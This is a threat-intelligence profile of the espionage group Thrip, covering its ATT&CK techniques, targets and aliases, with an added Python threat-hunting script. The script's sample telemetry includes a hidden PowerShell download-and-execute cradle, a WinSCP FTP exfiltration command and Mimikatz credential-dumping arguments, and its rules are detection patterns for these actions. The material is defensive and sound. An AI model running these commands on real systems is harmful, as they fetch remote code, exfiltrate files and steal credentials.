
Threat Actor Characterization

Thrip

ID: 3679225d7813542c3da5765e9b2088b705661
Category: Cybercrime; State-Sponsored
Threat types: Espionage, Intrusion, ICS Compromise, Living-off-the-land
Origin / operation zone codes: Unknown; HKG, IDN, MAC, MYS, PHL, VNM
Updated: 2026-01-26
Created: 2025-10-22
Progress: 61%; Completeness: 57%; Freshness: 70%
Operation zone: Hong Kong, Indonesia, Macao, Malaysia, Philippines, Vietnam
Aliases: Billbug, Lotus Blossom
MITRE ATT&CK®

Thrip (G0076) is an espionage group targeting satellite, telecom, geospatial-imaging, and defense organizations in the U.S. and Southeast Asia, using living-off-the-land tools (PowerShell, PsExec, WinSCP, LogMeIn) alongside custom backdoors (Catchamas, Hannotog, Sagerunex); Symantec later tracks the activity as Billbug.


Technique | Technique name | Tactic | Evidence

T1059.001 | PowerShell | TA0002 (Execution)
  • 2018-06-19 — PowerShell used to download payloads, traverse networks, and perform reconnaissance within victim environments.

T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | TA0010 (Exfiltration)
  • 2018-06-19 — Data exfiltration over FTP using WinSCP observed at a targeted organization.

T1588.002 | Obtain Capabilities: Tool | TA0042 (Resource Development)
  • 2018-06-19 — Group obtained and used dual-use tools including Mimikatz and PsExec during operations.

T1219.002 | Remote Access Software: Remote Desktop Software | TA0011 (Command and Control)
  • 2018-06-19 — Use of cloud-based remote access software LogMeIn during intrusions.

T1021.002 | Remote Services: SMB/Windows Admin Shares | TA0008 (Lateral Movement)
  • 2018-06-19 — PsExec leveraged for lateral movement and remote service execution across victim networks.
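The techniques above are all living-off-the-land behaviours, so a single hit on any one of them is noisy; what makes a host interesting is several of them clustering together. The following is an added example (not part of this profile or of Symantec's reporting) of how a hunter might map process-creation telemetry to these technique IDs and escalate hosts that show more than one. The log records, host names, IP addresses and process names (including the LogMeIn binary name) are constructed assumptions for the demo, and the patterns are deliberately coarse hunting heuristics rather than blocking rules.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Set, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon EID 1 / Security 4688 style). Constructed fields."""
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


def _img(e: ProcEvent, *names: str) -> bool:
    """True if the image's basename matches one of the given (lower-case) names."""
    return e.image.rsplit("\\", 1)[-1].lower() in names


# (technique id, label, predicate). Mapped to the ATT&CK techniques listed in the profile.
RULES: List[Tuple[str, str, Callable[[ProcEvent], bool]]] = [
    ("T1059.001", "PowerShell download / recon",
     lambda e: _img(e, "powershell.exe", "pwsh.exe")
     and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\s|-enc(odedcommand)?\s",
                   e.cmdline, re.I) is not None),
    ("T1021.002", "PsExec service execution over admin shares",
     lambda e: _img(e, "psexesvc.exe") or (_img(e, "psexec.exe", "psexec64.exe") and "\\\\" in e.cmdline)),
    ("T1048.003", "WinSCP FTP transfer",
     lambda e: _img(e, "winscp.exe", "winscp.com") and re.search(r"\bftp://", e.cmdline, re.I) is not None),
    ("T1219.002", "LogMeIn remote access agent",
     lambda e: _img(e, "logmein.exe")),  # assumed binary name; adjust to the agent actually deployed
    ("T1588.002", "Mimikatz-style credential access",
     lambda e: re.search(r"sekurlsa::|lsadump::|privilege::debug", e.cmdline, re.I) is not None),
]

# Constructed sample telemetry: two hosts with suspicious activity, one benign.
EVENTS: List[ProcEvent] = [
    ProcEvent("ws01", "corp\\jdoe", "explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.10/a.ps1')\""),
    ProcEvent("srv02", "corp\\svc_backup", "services.exe",
              r"C:\Windows\PSEXESVC.exe", r"C:\Windows\PSEXESVC.exe"),
    ProcEvent("ws01", "corp\\jdoe", "cmd.exe",
              r"C:\Program Files (x86)\WinSCP\WinSCP.com",
              r'WinSCP.com /command "open ftp://198.51.100.7" "put C:\export\*" "exit"'),
    ProcEvent("ws03", "corp\\asmith", "explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\Get-Inventory.ps1"),          # benign admin script
    ProcEvent("ws01", "corp\\jdoe", "cmd.exe",
              r"C:\Temp\m.exe", r'm.exe "privilege::debug" "sekurlsa::logonpasswords"'),
]


def match_techniques(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (host, technique id, label) for every rule that fires on an event."""
    return [(e.host, tid, label) for e in events for tid, label, pred in RULES if pred(e)]


def techniques_by_host(events: List[ProcEvent]) -> Dict[str, Set[str]]:
    """Collapse hits into the set of distinct technique IDs seen per host."""
    out: Dict[str, Set[str]] = {}
    for host, tid, _ in match_techniques(events):
        out.setdefault(host, set()).add(tid)
    return out


def prioritize(events: List[ProcEvent], min_distinct: int = 2) -> List[str]:
    """Hosts showing at least `min_distinct` different techniques, most techniques first."""
    by_host = techniques_by_host(events)
    ranked = sorted(by_host.items(), key=lambda kv: (-len(kv[1]), kv[0]))
    return [host for host, tids in ranked if len(tids) >= min_distinct]


if __name__ == "__main__":
    for host, tids in sorted(techniques_by_host(EVENTS).items()):
        print(f"{host}: {', '.join(sorted(tids))}")
    print("escalate:", prioritize(EVENTS))
```

Running it flags ws01 for three distinct techniques (PowerShell download, FTP transfer via WinSCP, credential access) and srv02 for one (the PsExec service), while the benign scripted PowerShell on ws03 produces no hit; only ws01 crosses the escalation threshold. The threshold is the point: per-technique hits on dual-use tools belong in a hunting queue, and it is the co-occurrence on one host, as in the 2018 evidence above, that justifies an incident.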
Strategic Intelligence
Last updated: 2025-10-23T15:37:04+00:00
THRIP — Living-off-the-land espionage targeting satellite, telecom, and defense

CLASSIFICATION: Unclassified / Open Source


Executive Summary

Thrip (MITRE G0076) is an espionage group active since at least 2017–2018, publicly exposed by Symantec for operations against satellite communications, telecommunications, geospatial-imaging, and defense organizations in the United States and Southeast Asia. Thrip relies heavily on living-off-the-land tooling (PowerShell, PsExec, WinSCP, LogMeIn) alongside custom malware including Infostealer.Catchamas and, later, Hannotog and Sagerunex. Activity included targeting systems that monitor and control satellites, indicating potential interest in operational disruption as well as collection. Symantec’s 2019 follow-up found continued campaigns across Hong Kong, Macau, Indonesia, Malaysia, the Philippines, and Vietnam; later analysis concluded that Thrip overlaps with, or is the same as, “Billbug (aka Lotus Blossom)” and is tracked under that name going forward. Overall confidence in these core facts is high.


  • Industries/Sectors: Satellite communications; Telecommunications; Geospatial-imaging; Defense; (also military and maritime communications noted in 2019).
  • Geography (Region): United States and Southeast Asia.
  • Countries (if available): U.S.; targets observed across Hong Kong, Macau, Indonesia, Malaysia, the Philippines, Vietnam (2019).
  • Timeframe: 2017–2025 (first public exposure 2018-06-19; continued activity noted 2019-09-09; MITRE page last modified 2025-04-25).